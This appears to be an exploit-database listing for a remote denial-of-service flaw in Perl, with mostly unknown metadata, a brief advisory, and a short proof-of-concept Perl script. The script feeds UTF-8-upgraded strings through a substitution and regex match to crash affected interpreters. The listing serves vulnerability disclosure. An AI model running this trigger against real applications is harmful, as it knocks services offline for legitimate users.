header-logo
Suggest Exploit
vendor:
Perl
by:
Unknown
N/A
CVSS
N/A
Denial-of-Service
Unknown
CWE
Product Name: Perl
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE:
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Perl Remote Denial-of-Service Vulnerability

The Perl scripting language is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause an application implemented with affected Perl code to abort, denying service to legitimate users.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/47006/info

Perl is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to cause an application implemented with affected perl code to abort, denying service to legitimate users. 

#!/usr/bin/perl


my @x = ("A=B","AAAA=/");
utf8::upgrade $_ for @x;
$x[1] =~ s{/\s*$}{};
for (@x) {
m{^([^=]+?)\s*=.+$};
}